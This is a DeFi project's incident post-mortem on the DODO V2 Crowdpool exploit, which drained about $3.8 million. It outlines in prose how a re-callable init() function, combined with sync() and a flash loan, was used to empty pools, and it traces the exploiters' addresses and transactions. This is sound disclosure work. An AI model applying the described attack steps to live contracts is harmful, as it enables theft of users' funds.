First of all, thank you for your patience and support as we investigate and rectify the recent exploit on DODO. We would also like to express our heartfelt gratitude to @samczsun of Paradigm, @tzhen, PeckShield, SlowMist, 1inch Exchange, and the Binance Smart Chain (BSC) team for their expertly advice, efforts, and urgency in helping us understand what happened and recover lost funds.
We ask the owners of the following addresses reach out to the DODO team at firstname.lastname@example.org, via our admin team on Telegram or Discord, or DM us on Twitter (@BreederDodo):
What We Know So Far
The exploits targeted several DODO V2 Crowdpools, namely the WSZO, WCRES, ETHA, and FUSI pool. Funds in all other pools, including all V1 pools and all non-Crowdpool V2 pools, are safe. In total, approximately $3.8 million, of which $1.88 million is expected to be returned (see below for more information), was drained as a result of these exploits.
The DODO V2 Crowdpooling smart contract has a bug that allows the init() function to be called multiple times. This means that an exploiter can perform an attack with the following steps:
- Exploiter creates a counterfeit token and initialize the smart contract with it by calling the init() function
- Exploiter calls the sync() function and sets the “reserve” variable, which represents the token balance, to 0
- Exploiter calls init() again to re-initialize - this time with a “real” token (i.e. tokens in DODO’s pools)
- Exploiter uses a flash loan to transfer all real tokens from the pools and bypass the flash loan check
In summary, there are two individuals involved in this exploit. We will refer to them as Individual A and Individual B.
Individual B has all the hallmarks of a frontrunning bot, because:
- They constructed their contract address with a prefix of several 0s
- They use the CHI gastoken
- They set extremely high gas prices; in one instance they raise configured the transaction to use 93,148 gwei
In addition, Individual B’s exploits preceded Individual A’s successful exploits by roughly ten minutes.
Individual A (https://etherscan.io/address/0x368a6558255bccac517da5106647d8182c571b23) has already contacted us through @samczsun and offered to send back the funds removed from DODO pools. Here is a detailed account of Individual A’s actions:
- Individual A interacted with a centralized exchange.
- Individual A withdrew 0.46597 ETH from Binance: https://etherscan.io/tx/0x970b32a8c81dd3fc47fa118621726fc418ec3526c4379470a4000ed7b448360f
- Individual A executed, in quick succession, 7 BUSD withdrawal transactions (see the link for one example), possibly involving the Binance Bridge: https://etherscan.io/tx/0x300de107cbca466abe121112848daaf7f5f0d15625d54773dd0bbbff4e276e93
- Individual A transfer their funds to another wallet address.
- Individual A transferred 67,416 BUSD to 0xa305fab8bda7e1638235b054889b3217441dd645 twice: https://etherscan.io/tx/0x306d08f3d8af85dfdea7a6edb336d7504e8ecc7c609e4b940d188ba68e11cab5 https://etherscan.io/tx/0x56dbf6421c6e6bd779ab0c12fd49e1f7714dd85023aa74abae1940f8d88669cf
- Individual A transferred 59,245.324743 USDT to 0xa305fab8bda7e1638235b054889b3217441dd645 twice: https://etherscan.io/tx/0xbee2f507b2f4b4321927a9762dac757df12fe1ba2d6f85314273b9ea542a5c13 https://cn.etherscan.com/tx/0xaf80cf58c88f0e0f2f44e3902e4c7cd2c17122511fbc6c2d9b2cd43fbc4199b9
- Individual A executed two exploits against DODO smart contracts.
- The first one was against the DODO-USDT test contract, and funds were transferred to 0xa305fab8bda7e1638235b054889b3217441dd645: https://etherscan.io/address/0x328410f276d4fe83fc78fa56ad32d9821a5e5c1c#tokentxns
- The second one was against the WCRES-USDT contract, and funds were transferred to 0x56178a0d5f301baf6cf3e1cd53d9863437345bf9: https://cn.etherscan.com/address/0x910fd17b9bfc42a6eea822912f036ef5a080be8a#tokentxns
- The funds are now in the following two addresses:
Individual B is most likely a bot. The suspected bot smart contract is https://etherscan.io/address/0x00000000e84f2bbdfb129ed6e495c7f879f3e634 and the trigger account address is https://etherscan.io/address/0x3554187576ec863af63eea81d25fbf6d3f3f13fc. Individual B executed 3 exploits against DODO contracts:
- ETHA-USDT: https://etherscan.io/tx/0x0b062361e16a2ea0942cc1b4462b6584208c8c864609ff73aaa640aaa2d92428
- WSZO-USDT: https://etherscan.io/tx/0xff9b3b2cb09d149762fcffc56ef71362bec1ef6a7d68727155c2d68f395ac1e8
- vETH-WETH, with 93,148 gwei: https://etherscan.io/tx/0x561f7ccb27b9928df33fa97c2fb99ea3750593e908f9f0f8baf22ec7ca0c5c4a
The funds are currently in the following two addresses:
Trading on the DODO platform is unaffected by the exploits.
Wallet addresses that have given DODO approvals are unaffected by the exploits.
Again, please reach out to the DODO team if you are the owner of the following addresses:
The DODO Team